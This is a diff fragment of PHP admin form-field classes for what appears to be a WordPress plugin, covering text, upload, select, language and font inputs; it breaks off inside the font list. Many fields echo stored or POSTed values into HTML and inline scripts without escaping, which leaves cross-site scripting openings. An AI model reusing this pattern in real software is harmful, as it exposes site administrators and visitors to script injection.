18 |
+
function getData() {
|
19 |
+
return $this->data;
|
20 |
+
}
|
21 |
+
function getSelected() {
|
22 |
+
return $this->selected;
|
23 |
+
}
|
24 |
+
final function getName() {
|
25 |
+
return $this->name;
|
26 |
+
}
|
27 |
+
final function getError() {
|
28 |
+
return $this->isError;
|
29 |
+
}
|
30 |
+
final function getErrorMsg() {
|
31 |
+
return $this->errormsg;
|
32 |
+
}
|
33 |
+
final function setError($error, $errormsg = "") {
|
34 |
+
if ($errormsg != "")
|
35 |
+
$this->errormsg = $errormsg;
|
36 |
+
if ($error) {
|
37 |
+
self::$_errors++;
|
38 |
+
$this->isError = true;
|
39 |
+
}
|
40 |
+
}
|
41 |
+
protected final function checkData() {
|
42 |
+
$this->newData = $_POST[$this->name];
|
43 |
+
if (is_array($this->constraints)) {
|
44 |
+
foreach ($this->constraints as $key => $val) {
|
45 |
+
if ($this->constraints[$key]['op'] == "eq") {
|
46 |
+
if ($val['func']($this->newData) == $this->constraints[$key]['val']) {
|
47 |
+
;
|
48 |
+
} else {
|
49 |
+
$this->setError(true);
|
50 |
+
return false;
|
51 |
+
}
|
52 |
+
} else if ($this->constraints[$key]['op'] == "ge") {
|
53 |
+
if ($val['func']($this->newData) >= $this->constraints[$key]['val']) {
|
54 |
+
;
|
55 |
+
} else {
|
56 |
+
$this->setError(true);
|
57 |
+
return false;
|
58 |
+
}
|
59 |
+
} else {
|
60 |
+
if ($val['func']($this->newData) < $this->constraints[$key]['val']) {
|
61 |
+
;
|
62 |
+
} else {
|
63 |
+
$this->setError(true);
|
64 |
+
return false;
|
65 |
+
}
|
66 |
+
}
|
67 |
+
}
|
68 |
+
}
|
69 |
+
$this->data = $this->newData;
|
70 |
+
return true;
|
71 |
+
}
|
72 |
+
protected function getType() {
|
73 |
+
if (isset($_POST[$this->name])) {
|
74 |
+
if (!$this->checkData() || $this->getError()) {
|
75 |
+
/*errormessage*/
|
76 |
+
echo "<div class='errorMsg'>" . (($this->errormsg != "") ? $this->errormsg : self::$_globalerrormsg) . "</div>";
|
77 |
+
} else {
|
78 |
+
$this->data = $_POST[$this->name];
|
79 |
+
}
|
80 |
+
}
|
81 |
+
}
|
82 |
+
static function getErrorNum() {
|
83 |
+
return self::$_errors;
|
84 |
+
}
|
85 |
+
}
|
86 |
+
}
|
87 |
+
|
88 |
+
if (!class_exists("wpdreamsHidden")) {
|
89 |
+
class wpdreamsHidden extends wpdreamsType {
|
90 |
+
function getType() {
|
91 |
+
echo "<input type='hidden' id='wpdreamshidden_" . self::$_instancenumber . "' name='" . $this->name . "' value='" . $this->data . "' />";
|
92 |
+
}
|
93 |
+
}
|
94 |
+
}
|
95 |
+
|
96 |
+
if (!class_exists("wpdreamsInfo")) {
|
97 |
+
class wpdreamsInfo extends wpdreamsType {
|
98 |
+
function __construct($data) {
|
99 |
+
$this->data = $data;
|
100 |
+
$this->getType();
|
101 |
+
}
|
102 |
+
function getType() {
|
103 |
+
echo "<img class='infoimage' src='" . plugins_url('/types/icons/info.png', __FILE__) . "' title='" . $this->data . "' />";
|
104 |
+
}
|
105 |
+
}
|
106 |
+
}
|
107 |
+
|
108 |
+
if (!class_exists("wpdreamsText")) {
|
109 |
+
class wpdreamsText extends wpdreamsType {
|
110 |
+
function getType() {
|
111 |
+
parent::getType();
|
112 |
+
echo "<div class='wpdreamsText'>";
|
113 |
+
if ($this->label != "")
|
114 |
+
echo "<label for='wpdreamstext_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
115 |
+
echo "<input type='text' id='wpdreamstext_" . self::$_instancenumber . "' name='" . $this->name . "' value='" . $this->data . "' />";
|
116 |
+
echo "
|
117 |
+
<div class='triggerer'></div>
|
118 |
+
</div>";
|
119 |
+
}
|
120 |
+
}
|
121 |
+
}
|
122 |
+
|
123 |
+
if (!class_exists("wpdreamsTextSmall")) {
|
124 |
+
class wpdreamsTextSmall extends wpdreamsType {
|
125 |
+
function getType() {
|
126 |
+
parent::getType();
|
127 |
+
echo "<div class='wpdreamsTextSmall'>";
|
128 |
+
if ($this->label != "")
|
129 |
+
echo "<label for='wpdreamstextsmall_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
130 |
+
echo "<input class='small' type='text' id='wpdreamstextsmall_" . self::$_instancenumber . "' name='" . $this->name . "' value='" . $this->data . "' />";
|
131 |
+
echo "
|
132 |
+
<div class='triggerer'></div>
|
133 |
+
</div>";
|
134 |
+
}
|
135 |
+
}
|
136 |
+
}
|
137 |
+
|
138 |
+
if (!class_exists("wpdreamsTextarea")) {
|
139 |
+
class wpdreamsTextarea extends wpdreamsType {
|
140 |
+
function getType() {
|
141 |
+
parent::getType();
|
142 |
+
echo "<label style='vertical-align: top;' for='wpdreamstextarea_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
143 |
+
echo "<textarea id='wpdreamstextarea_" . self::$_instancenumber . "' name='" . $this->name . "'>" . stripcslashes($this->data) . "</textarea>";
|
144 |
+
}
|
145 |
+
}
|
146 |
+
}
|
147 |
+
|
148 |
+
if (!class_exists("wpdreamsUpload")) {
|
149 |
+
class wpdreamsUpload extends wpdreamsType {
|
150 |
+
function getType() {
|
151 |
+
parent::getType();
|
152 |
+
echo "<div>";
|
153 |
+
if ($this->data != "") {
|
154 |
+
echo "<img class='preview' rel='#overlay_" . self::$_instancenumber . "' src=" . $this->data . " />";
|
155 |
+
} else {
|
156 |
+
echo "<img class='preview' style='display:none;' rel='#overlay_" . self::$_instancenumber . "' />";
|
157 |
+
}
|
158 |
+
echo "<label for='wpdreamsUpload_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
159 |
+
echo "<input type='text' class='wpdreamsUpload' id='wpdreamsUpload_" . self::$_instancenumber . "' name='" . $this->name . "' value='" . $this->data . "' />";
|
160 |
+
echo "<input class='wpdreamsUpload_button'type='button' value='Upload Image' />";
|
161 |
+
echo "<br />Enter an URL or upload an image!";
|
162 |
+
echo "<div class='overlay' id='overlay_" . self::$_instancenumber . "'><img src=" . $this->data . " /></div>";
|
163 |
+
echo "</div>";
|
164 |
+
}
|
165 |
+
}
|
166 |
+
}
|
167 |
+
|
168 |
+
if (!class_exists("wpdreamsLabelPosition")) {
|
169 |
+
class wpdreamsLabelPosition extends wpdreamsType {
|
170 |
+
function __construct($name, $label, $width, $height, $data) {
|
171 |
+
$this->constraints = null;
|
172 |
+
$this->name = $name;
|
173 |
+
$this->label = $label;
|
174 |
+
$this->data = $data;
|
175 |
+
$this->width = $width;
|
176 |
+
$this->height = $height;
|
177 |
+
$this->ratio = 400 / $this->width;
|
178 |
+
$this->cheight = $this->ratio * $this->height;
|
179 |
+
self::$_instancenumber++;
|
180 |
+
$this->direction = "";
|
181 |
+
$this->duration = "";
|
182 |
+
$this->getType();
|
183 |
+
}
|
184 |
+
function getType() {
|
185 |
+
parent::getType();
|
186 |
+
$this->processData();
|
187 |
+
$inst = self::$_instancenumber;
|
188 |
+
echo "
|
189 |
+
<div class='labeldrag' id='labeldrag_" . $inst . "' style='height:" . ($this->cheight + 90) . "px;'>
|
190 |
+
<div class='inner' style='overflow:auto;width:400px;height:" . $this->cheight . "px;'>
|
191 |
+
<script>
|
192 |
+
jQuery(document).ready(function() {
|
193 |
+
var drag = jQuery('#" . $this->name . "_" . $inst . "').draggable({ containment: 'parent', refreshPositions: true, appendTo: 'body' });
|
194 |
+
jQuery('#" . $this->name . "_" . $inst . "').bind( 'dragstop', function(event, ui) {
|
195 |
+
var pos = drag.position();
|
196 |
+
var ratio = " . $this->ratio . ";
|
197 |
+
var hidden = jQuery('#labelposition_hidden_" . $inst . "');
|
198 |
+
var duration = jQuery('input[name=\"induration_" . $this->name . "\"]')[0];
|
199 |
+
var direction= jQuery('input[name=\"indirection_" . $this->name . "\"]').prev();
|
200 |
+
jQuery(hidden).val('duration:'+jQuery(duration).val()+';direction:'+jQuery(direction).val()+';position:'+((pos.top+5)/ratio)+'||'+((pos.left+5)/ratio)+';');
|
201 |
+
});
|
202 |
+
jQuery('#labeldrag_" . $inst . " input').keyup(function(){
|
203 |
+
jQuery('#" . $this->name . "_" . $inst . "').trigger('dragstop');
|
204 |
+
});
|
205 |
+
jQuery('#labeldrag_" . $inst . " select').change(function(){
|
206 |
+
jQuery('#" . $this->name . "_" . $inst . "').trigger('dragstop');
|
207 |
+
});
|
208 |
+
});
|
209 |
+
</script>
|
210 |
+
<div class='dragme' style='top:" . (($this->top * $this->ratio) - 5) . "px;left:" . (($this->left * $this->ratio) - 5) . "px;' id='" . $this->name . "_" . $inst . "'>
|
211 |
+
</div>
|
212 |
+
</div>
|
213 |
+
";
|
214 |
+
echo "<div style='margin-top:" . ($this->cheight + 10) . "px;'>";
|
215 |
+
new wpdreamsSelect("indirection_" . $this->name, "Animation direction", $this->_direction);
|
216 |
+
new wpdreamsText("induration_" . $this->name, "Animation duration (ms)", $this->duration);
|
217 |
+
echo "</div>";
|
218 |
+
echo "
|
219 |
+
</div>
|
220 |
+
<div style='clear:both'></div>
|
221 |
+
<input type='hidden' id='labelposition_hidden_" . $inst . "' name='" . $this->name . "' value='" . $this->data . "' />
|
222 |
+
";
|
223 |
+
echo "
|
224 |
+
|
225 |
+
";
|
226 |
+
}
|
227 |
+
function processData() {
|
228 |
+
// string: 'duration:123;direction:bottom-left;position:123||321;'
|
229 |
+
$this->data = str_replace("\n", "", $this->data);
|
230 |
+
preg_match("/duration:(.*?);/", $this->data, $matches);
|
231 |
+
$this->duration = $matches[1];
|
232 |
+
if ($this->duration == "")
|
233 |
+
$this->duration = 500;
|
234 |
+
preg_match("/direction:(.*?);/", $this->data, $matches);
|
235 |
+
$this->direction = $matches[1];
|
236 |
+
if ($this->direction == "")
|
237 |
+
$this->direction = "top-left";
|
238 |
+
$this->_direction = "
|
239 |
+
Top|top;
|
240 |
+
Bottom|bottom;
|
241 |
+
Left|left;
|
242 |
+
Right|right;
|
243 |
+
Bottom-Left|bottom-left;
|
244 |
+
Bottom-Right|bottom-right;
|
245 |
+
Top-Left|top-left;
|
246 |
+
Top-Right|top-right;
|
247 |
+
Random|random||
|
248 |
+
" . $this->direction;
|
249 |
+
preg_match("/position:(.*?);/", $this->data, $matches);
|
250 |
+
$this->position = $matches[1];
|
251 |
+
$_temp = explode("||", $this->position);
|
252 |
+
$this->top = $_temp[0];
|
253 |
+
$this->left = $_temp[1];
|
254 |
+
}
|
255 |
+
}
|
256 |
+
}
|
257 |
+
|
258 |
+
if (!class_exists("wpdreamsImageParser")) {
|
259 |
+
class wpdreamsImageParser extends wpdreamsType {
|
260 |
+
function __construct($name, $label, $uid, $callback) {
|
261 |
+
$this->name = $name;
|
262 |
+
$this->uid = $uid;
|
263 |
+
$this->label = $label;
|
264 |
+
$this->callback = $callback;
|
265 |
+
$this->isError = false;
|
266 |
+
self::$_instancenumber++;
|
267 |
+
$this->getType();
|
268 |
+
}
|
269 |
+
function getType() {
|
270 |
+
echo "<form name='" . $this->name . "' class='wpdreams-ajaxinput' style='height:40px;margin-left: -535px;'>";
|
271 |
+
//echo "<label for='wpdreamsAjaxInput_".self::$_instancenumber."'>".$this->label."</label>";
|
272 |
+
echo "<input type='hidden' name='callback' value='" . $this->callback . "' />";
|
273 |
+
echo "<input type='hidden' name='uid' value='" . $this->uid . "' />";
|
274 |
+
echo "<input type='text' id='wpdreamsAjaxInput_" . self::$_instancenumber . "' name='url' value='Enter the feed url here...' />";
|
275 |
+
echo "
|
276 |
+
<select style='width: 70px;' name='itemsnum'>
|
277 |
+
<option value='1'>1</option>
|
278 |
+
<option value='2'>2</option>
|
279 |
+
<option value='3'>3</option>
|
280 |
+
<option value='4'>4</option>
|
281 |
+
<option value='5'>5</option>
|
282 |
+
<option value='6'>6</option>
|
283 |
+
<option value='7'>7</option>
|
284 |
+
<option value='8'>8</option>
|
285 |
+
<option value='9'>9</option>
|
286 |
+
<option value='10'>10</option>
|
287 |
+
</select>";
|
288 |
+
echo "<select style='width: 130px;' name='itemsnum'>";
|
289 |
+
echo "
|
290 |
+
<option value='flickr'>Source</option>
|
291 |
+
<option value='flickr'>Flickr.com</option>
|
292 |
+
<option value='500px'>500px.com</option>
|
293 |
+
";
|
294 |
+
echo "</select>";
|
295 |
+
echo "<input type='button' class='default' value='Generate!'/>";
|
296 |
+
echo " " . $this->label . "<img opened='0' style='cursor:pointer;vertical-align:middle;height:20px;' src='" . plugins_url('/types/icons/arrow-right.png', __FILE__) . "' />";
|
297 |
+
echo "</form>";
|
298 |
+
}
|
299 |
+
}
|
300 |
+
}
|
301 |
+
|
302 |
+
if (!class_exists("wpdreamsUploadReset")) {
|
303 |
+
class wpdreamsUploadReset extends wpdreamsType {
|
304 |
+
function __construct($name, $label, $data, $default_data, $constraints = null, $errormsg = "") {
|
305 |
+
$this->name = $name;
|
306 |
+
$this->label = $label;
|
307 |
+
$this->constraints = $constraints;
|
308 |
+
$this->errormsg = $errormsg;
|
309 |
+
$this->data = $data;
|
310 |
+
$this->default_data = $default_data;
|
311 |
+
$this->isError = false;
|
312 |
+
self::$_instancenumber++;
|
313 |
+
$this->getType();
|
314 |
+
}
|
315 |
+
function getType() {
|
316 |
+
parent::getType();
|
317 |
+
echo "<div>";
|
318 |
+
if ($this->data != "") {
|
319 |
+
echo "<img class='preview' rel='#overlay_" . self::$_instancenumber . "' src=" . $this->data . " />";
|
320 |
+
} else {
|
321 |
+
echo "<img class='preview' style='display:none;' rel='#overlay_" . self::$_instancenumber . "' />";
|
322 |
+
}
|
323 |
+
echo "<label for='wpdreamsUploadReset_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
324 |
+
echo "<input type='text' class='wpdreamsUpload' id='wpdreamsUploadReset_" . self::$_instancenumber . "' name='" . $this->name . "' value='" . $this->data . "' />";
|
325 |
+
echo "<input class='wpdreamsUpload_button' type='button' value='Upload Image' />";
|
326 |
+
echo "<input type='button' class='default' name='default' value='Default' />";
|
327 |
+
echo "<input type='hidden' value='" . $this->default_data . "' />";
|
328 |
+
echo "<br />Enter an URL or upload an image!";
|
329 |
+
echo "<div class='overlay' id='overlay_" . self::$_instancenumber . "'><img src='" . $this->data . "'' /></div>";
|
330 |
+
echo "</div>";
|
331 |
+
}
|
332 |
+
}
|
333 |
+
}
|
334 |
+
|
335 |
+
if (!class_exists("wpdreamsSelect")) {
|
336 |
+
class wpdreamsSelect extends wpdreamsType {
|
337 |
+
function getType() {
|
338 |
+
parent::getType();
|
339 |
+
$this->processData();
|
340 |
+
echo "<div class='wpdreamsSelect'>";
|
341 |
+
echo "<label for='wpdreamsselect_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
342 |
+
echo "<select class='wpdreamsselect' id='wpdreamsselect_" . self::$_instancenumber . "' name='" . $this->name . "_select'>";
|
343 |
+
foreach ($this->selects as $sel) {
|
344 |
+
preg_match('/(?<option>.*?)\\|(?<value>.*)/', $sel, $matches);
|
345 |
+
$matches['value'] = trim($matches['value']);
|
346 |
+
$matches['option'] = trim($matches['option']);
|
347 |
+
if ($matches['value'] == $this->selected)
|
348 |
+
echo "<option value='" . $matches['value'] . "' selected='selected'>" . $matches['option'] . "</option>";
|
349 |
+
else
|
350 |
+
echo "<option value='" . $matches['value'] . "'>" . $matches['option'] . "</option>";
|
351 |
+
}
|
352 |
+
echo "</select>";
|
353 |
+
echo "<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
354 |
+
echo "<div class='triggerer'></div>
|
355 |
+
</div>";
|
356 |
+
}
|
357 |
+
function processData() {
|
358 |
+
//$this->data = str_replace("\n","",$this->data);
|
359 |
+
$_temp = explode("||", $this->data);
|
360 |
+
$this->selects = explode(";", $_temp[0]);
|
361 |
+
$this->selected = trim($_temp[1]);
|
362 |
+
}
|
363 |
+
final function getData() {
|
364 |
+
return $this->data;
|
365 |
+
}
|
366 |
+
final function getSelected() {
|
367 |
+
return $this->selected;
|
368 |
+
}
|
369 |
+
}
|
370 |
+
}
|
371 |
+
|
372 |
+
if (!class_exists("wpdreamsLanguageSelect")) {
|
373 |
+
class wpdreamsLanguageSelect extends wpdreamsType {
|
374 |
+
|
375 |
+
function getType() {
|
376 |
+
parent::getType();
|
377 |
+
$this->languages = array(
|
378 |
+
'ab' => 'Abkhazian',
|
379 |
+
'aa' => 'Afar',
|
380 |
+
'af' => 'Afrikaans',
|
381 |
+
'ak' => 'Akan',
|
382 |
+
'sq' => 'Albanian',
|
383 |
+
'am' => 'Amharic',
|
384 |
+
'ar' => 'Arabic',
|
385 |
+
'an' => 'Aragonese',
|
386 |
+
'hy' => 'Armenian',
|
387 |
+
'as' => 'Assamese',
|
388 |
+
'av' => 'Avaric',
|
389 |
+
'ae' => 'Avestan',
|
390 |
+
'ay' => 'Aymara',
|
391 |
+
'az' => 'Azerbaijani',
|
392 |
+
'bm' => 'Bambara',
|
393 |
+
'ba' => 'Bashkir',
|
394 |
+
'eu' => 'Basque',
|
395 |
+
'be' => 'Belarusian',
|
396 |
+
'bn' => 'Bengali',
|
397 |
+
'bh' => 'Bihari',
|
398 |
+
'bi' => 'Bislama',
|
399 |
+
'nb' => 'Bokmal',
|
400 |
+
'bs' => 'Bosnian',
|
401 |
+
'br' => 'Breton',
|
402 |
+
'bg' => 'Bulgarian',
|
403 |
+
'my' => 'Burmese',
|
404 |
+
'ca' => 'Catalan',
|
405 |
+
'km' => 'Central Khmer',
|
406 |
+
'ch' => 'Chamorro',
|
407 |
+
'ce' => 'Chechen',
|
408 |
+
'ny' => 'Chewa',
|
409 |
+
'zh' => 'Chinese',
|
410 |
+
'cu' => 'Church Slavic',
|
411 |
+
'cv' => 'Chuvash',
|
412 |
+
'kw' => 'Cornish',
|
413 |
+
'co' => 'Corsican',
|
414 |
+
'cr' => 'Cree',
|
415 |
+
'hr' => 'Croatian',
|
416 |
+
'cs' => 'Czech',
|
417 |
+
'da' => 'Danish',
|
418 |
+
'dv' => 'Dhivehi',
|
419 |
+
'nl' => 'Dutch',
|
420 |
+
'dz' => 'Dzongkha',
|
421 |
+
'en' => 'English',
|
422 |
+
'eo' => 'Esperanto',
|
423 |
+
'et' => 'Estonian',
|
424 |
+
'ee' => 'Ewe',
|
425 |
+
'fo' => 'Faroese',
|
426 |
+
'fj' => 'Fijian',
|
427 |
+
'fi' => 'Finnish',
|
428 |
+
'fr' => 'French',
|
429 |
+
'ff' => 'Fulah',
|
430 |
+
'gd' => 'Gaelic',
|
431 |
+
'gl' => 'Galician',
|
432 |
+
'lg' => 'Ganda',
|
433 |
+
'ka' => 'Georgian',
|
434 |
+
'de' => 'German',
|
435 |
+
'ki' => 'Gikuyu',
|
436 |
+
'el' => 'Greek',
|
437 |
+
'kl' => 'Greenlandic',
|
438 |
+
'gn' => 'Guarani',
|
439 |
+
'gu' => 'Gujarati',
|
440 |
+
'ht' => 'Haitian',
|
441 |
+
'ha' => 'Hausa',
|
442 |
+
'he' => 'Hebrew',
|
443 |
+
'hz' => 'Herero',
|
444 |
+
'hi' => 'Hindi',
|
445 |
+
'ho' => 'Hiri Motu',
|
446 |
+
'hu' => 'Hungarian',
|
447 |
+
'is' => 'Icelandic',
|
448 |
+
'io' => 'Ido',
|
449 |
+
'ig' => 'Igbo',
|
450 |
+
'id' => 'Indonesian',
|
451 |
+
'ia' => 'Interlingua',
|
452 |
+
'iu' => 'Inuktitut',
|
453 |
+
'ik' => 'Inupiaq',
|
454 |
+
'ga' => 'Irish',
|
455 |
+
'it' => 'Italian',
|
456 |
+
'ja' => 'Japanese',
|
457 |
+
'jv' => 'Javanese',
|
458 |
+
'kn' => 'Kannada',
|
459 |
+
'kr' => 'Kanuri',
|
460 |
+
'ks' => 'Kashmiri',
|
461 |
+
'kk' => 'Kazakh',
|
462 |
+
'rw' => 'Kinyarwanda',
|
463 |
+
'kv' => 'Komi',
|
464 |
+
'kg' => 'Kongo',
|
465 |
+
'ko' => 'Korean',
|
466 |
+
'ku' => 'Kurdish',
|
467 |
+
'kj' => 'Kwanyama',
|
468 |
+
'ky' => 'Kyrgyz',
|
469 |
+
'lo' => 'Lao',
|
470 |
+
'la' => 'Latin',
|
471 |
+
'lv' => 'Latvian',
|
472 |
+
'lb' => 'Letzeburgesch',
|
473 |
+
'li' => 'Limburgan',
|
474 |
+
'ln' => 'Lingala',
|
475 |
+
'lt' => 'Lithuanian',
|
476 |
+
'lu' => 'Luba-Katanga',
|
477 |
+
'mk' => 'Macedonian',
|
478 |
+
'mg' => 'Malagasy',
|
479 |
+
'ms' => 'Malay',
|
480 |
+
'ml' => 'Malayalam',
|
481 |
+
'mt' => 'Maltese',
|
482 |
+
'gv' => 'Manx',
|
483 |
+
'mi' => 'Maori',
|
484 |
+
'mr' => 'Marathi',
|
485 |
+
'mh' => 'Marshallese',
|
486 |
+
'ro' => 'Moldavian',
|
487 |
+
'mn' => 'Mongolian',
|
488 |
+
'na' => 'Nauru',
|
489 |
+
'nv' => 'Navajo',
|
490 |
+
'ng' => 'Ndonga',
|
491 |
+
'ne' => 'Nepali',
|
492 |
+
'nd' => 'North Ndebele',
|
493 |
+
'se' => 'Northern Sami',
|
494 |
+
'no' => 'Norwegian',
|
495 |
+
'nn' => 'Norwegian Nynorsk',
|
496 |
+
'ie' => 'Occidental',
|
497 |
+
'oc' => 'Occitan',
|
498 |
+
'oj' => 'Ojibwa',
|
499 |
+
'or' => 'Oriya',
|
500 |
+
'om' => 'Oromo',
|
501 |
+
'os' => 'Ossetian',
|
502 |
+
'pi' => 'Pali',
|
503 |
+
'fa' => 'Persian',
|
504 |
+
'pl' => 'Polish',
|
505 |
+
'pt' => 'Portuguese',
|
506 |
+
'pa' => 'Punjabi',
|
507 |
+
'ps' => 'Pushto',
|
508 |
+
'qu' => 'Quechua',
|
509 |
+
'ro' => 'Romanian',
|
510 |
+
'rm' => 'Romansh',
|
511 |
+
'rn' => 'Rundi',
|
512 |
+
'ru' => 'Russian',
|
513 |
+
'sm' => 'Samoan',
|
514 |
+
'sg' => 'Sango',
|
515 |
+
'sa' => 'Sanskrit',
|
516 |
+
'sc' => 'Sardinian',
|
517 |
+
'sr' => 'Serbian',
|
518 |
+
'sn' => 'Shona',
|
519 |
+
'ii' => 'Sichuan Yi',
|
520 |
+
'sd' => 'Sindhi',
|
521 |
+
'si' => 'Sinhalese',
|
522 |
+
'sk' => 'Slovak',
|
523 |
+
'sl' => 'Slovenian',
|
524 |
+
'so' => 'Somali',
|
525 |
+
'st' => 'Southern Sotho',
|
526 |
+
'nr' => 'South Ndebele',
|
527 |
+
'es' => 'Spanish',
|
528 |
+
'su' => 'Sundanese',
|
529 |
+
'sw' => 'Swahili',
|
530 |
+
'ss' => 'Swati',
|
531 |
+
'sv' => 'Swedish',
|
532 |
+
'tl' => 'Tagalog',
|
533 |
+
'ty' => 'Tahitian',
|
534 |
+
'tg' => 'Tajik',
|
535 |
+
'ta' => 'Tamil',
|
536 |
+
'tt' => 'Tatar',
|
537 |
+
'te' => 'Telugu',
|
538 |
+
'th' => 'Thai',
|
539 |
+
'bo' => 'Tibetan',
|
540 |
+
'ti' => 'Tigrinya',
|
541 |
+
'to' => 'Tonga',
|
542 |
+
'ts' => 'Tsonga',
|
543 |
+
'tn' => 'Tswana',
|
544 |
+
'tr' => 'Turkish',
|
545 |
+
'tk' => 'Turkmen',
|
546 |
+
'tw' => 'Twi',
|
547 |
+
'uk' => 'Ukrainian',
|
548 |
+
'ur' => 'Urdu',
|
549 |
+
'ug' => 'Uyghur',
|
550 |
+
'uz' => 'Uzbek',
|
551 |
+
've' => 'Venda',
|
552 |
+
'vi' => 'Vietnamese',
|
553 |
+
'vo' => 'VolapA1k',
|
554 |
+
'wa' => 'Walloon',
|
555 |
+
'cy' => 'Welsh',
|
556 |
+
'fy' => 'Western Frisian',
|
557 |
+
'wo' => 'Wolof',
|
558 |
+
'xh' => 'Xhosa',
|
559 |
+
'yi' => 'Yiddish',
|
560 |
+
'yo' => 'Yoruba',
|
561 |
+
'za' => 'Zhuang',
|
562 |
+
'zu' => 'Zulu'
|
563 |
+
);
|
564 |
+
echo "<div class='wpdreamsLanguageSelect'>";
|
565 |
+
echo "<label for='wpdreamslanguageselect_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
566 |
+
echo "<select class='wpdreamsselect' id='wpdreamsselect_" . self::$_instancenumber . "' name='" . $this->name . "_select'>";
|
567 |
+
foreach ($this->languages as $k=>$v) {
|
568 |
+
if ($k == $this->data)
|
569 |
+
echo "<option value='" . $k . "' selected='selected'>" . $v . "</option>";
|
570 |
+
else
|
571 |
+
echo "<option value='" . $k . "'>" . $v . "</option>";
|
572 |
+
}
|
573 |
+
echo "</select>";
|
574 |
+
echo "<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
575 |
+
echo "<div class='triggerer'></div>
|
576 |
+
</div>";
|
577 |
+
}
|
578 |
+
final function getData() {
|
579 |
+
return $this->data;
|
580 |
+
}
|
581 |
+
}
|
582 |
+
}
|
583 |
+
|
584 |
+
|
585 |
+
|
586 |
+
|
587 |
+
if (!class_exists("wpdreamsFont")) {
|
588 |
+
class wpdreamsFont extends wpdreamsType {
|
589 |
+
function getType() {
|
590 |
+
parent::getType();
|
591 |
+
wp_register_script('wpdreams-fonts', plugin_dir_url(__FILE__) . '/types/fonts.js', array(
|
592 |
+
'jquery',
|
593 |
+
'media-upload',
|
594 |
+
'thickbox'
|
595 |
+
));
|
596 |
+
wp_enqueue_script('wpdreams-fonts');
|
597 |
+
$this->data = str_replace('\\', "", stripcslashes($this->data));
|
598 |
+
preg_match("/family:(.*?);/", $this->data, $_fonts);
|
599 |
+
$this->font = $_fonts[1];
|
600 |
+
preg_match("/weight:(.*?);/", $this->data, $_weight);
|
601 |
+
$this->weight = $_weight[1];
|
602 |
+
preg_match("/color:(.*?);/", $this->data, $_color);
|
603 |
+
$this->color = $_color[1];
|
604 |
+
preg_match("/size:(.*?);/", $this->data, $_size);
|
605 |
+
$this->size = $_size[1];
|
606 |
+
preg_match("/height:(.*?);/", $this->data, $_lineheight);
|
607 |
+
$this->lineheight = $_lineheight[1];
|
608 |
+
$applied_style = "font-family:" . ($this->font) . ";font-weight:" . $this->weight . ";line-height:".$this->lineheight.";color:" . $this->color;
|
609 |
+
echo $this->getScript();
|
610 |
+
echo "<div class='wpdreamsFont'>
|
611 |
+
<fieldset>
|
612 |
+
<legend>" . $this->label . "</legend>
|
613 |
+
";
|
614 |
+
echo "<label for='wpdreamsfont_" . self::$_instancenumber . "' style=\"" . $applied_style . "\">Test Text :)</label>";
|
615 |
+
echo "<select class='wpdreamsfont' id='wpdreamsfont_" . self::$_instancenumber . "' name='" . self::$_instancenumber . "_select'>";
|
616 |
+
$options = '
|
617 |
+
<option disabled>-------Classic Webfonts-------</option>
|
618 |
+
<option value="\'Arial\', Helvetica, sans-serif" style="font-family:Arial, Helvetica, sans-serif">Arial, Helvetica, sans-serif</option>
|
619 |
+
<option value="\'Arial Black\', Gadget, sans-serif" style="font-family:\'Arial Black\', Gadget, sans-serif">"Arial Black", Gadget, sans-serif</option>
|
620 |
+
<option value="\'Comic Sans MS\', cursive" style="font-family:\'Comic Sans MS\', cursive">"Comic Sans MS", cursive</option>
|
621 |
+
<option value="\'Courier New\', Courier, monospace" style="font-family:\'Courier New\', Courier, monospace">"Courier New", Courier, monospace</option>
|
622 |
+
<option value="\'Georgia\', serif" style="font-family:Georgia, serif">Georgia, serif</option>
|
623 |
+
<option value="\'Impact\', Charcoal, sans-serif" style="font-family:Impact, Charcoal, sans-serif">Impact, Charcoal, sans-serif</option>
|
624 |
+
<option value="\'Lucida Console\', Monaco, monospace" style="font-family:\'Lucida Console\', Monaco, monospace">"Lucida Console", Monaco, monospace</option>
|
625 |
+
<option value="\'Lucida Sans Unicode\', \'Lucida Grande\', sans-serif" style="font-family:\'Lucida Sans Unicode\', \'Lucida Grande\', sans-serif">"Lucida Sans Unicode", "Lucida Grande", sans-serif</option>
|
626 |
+
<option value="\'Palatino Linotype\', \'Book Antiqua\', Palatino, serif" style="font-family:\'Palatino Linotype\', \'Book Antiqua\', Palatino, serif">"Palatino Linotype", "Book Antiqua", Palatino, serif</option>
|
627 |
+
<option value="\'Tahoma\', Geneva, sans-serif" style="font-family:Tahoma, Geneva, sans-serif">Tahoma, Geneva, sans-serif</option>
|
628 |
+
<option value="\'Times New Roman\', Times, serif" style="font-family:\'Times New Roman\', Times, serif">"Times New Roman", Times, serif</option>
|
629 |
+
<option value="\'Trebuchet MS\', Helvetica, sans-serif" style="font-family:\'Trebuchet MS\', Helvetica, sans-serif">"Trebuchet MS", Helvetica, sans-serif</option>
|
630 |
+
<option value="\'Verdana\', Geneva, sans-serif" style="font-family:Verdana, Geneva, sans-serif">Verdana, Geneva, sans-serif</option>
|
631 |
+
<option value="\'Symbol\'" style="font-family:Symbol">Symbol</option>
|
632 |
+
<option value="\'Webdings\'" style="font-family:Webdings">Webdings</option>
|
633 |
+
<option value="\'Wingdings\', \'Zapf Dingbats\'" style="font-family:Wingdings, \'Zapf Dingbats\'">Wingdings, "Zapf Dingbats"</option>
|
634 |
+
<option value="\'MS Sans Serif\', Geneva, sans-serif" style="font-family:\'MS Sans Serif\', Geneva, sans-serif">"MS Sans Serif", Geneva, sans-serif</option>
|
635 |
+
<option value="\'MS Serif\', \'New York\', serif" style="font-family:\'MS Serif\', \'New York\', serif">"MS Serif", "New York", serif</option>
|
636 |
+
<option disabled>-------Google Webfonts-------</option>
|
637 |
+
<option value="Allan" style="font-family: Allan,Allan;"> Allan</option>
|
638 |
+
<option value="Allerta" style="font-family: Allerta,Allerta;"> Allerta</option>
|
639 |
+
<option value="Allerta Stencil" style="font-family: Allerta Stencil,Allerta Stencil;"> Allerta Stencil</option>
|
640 |
+
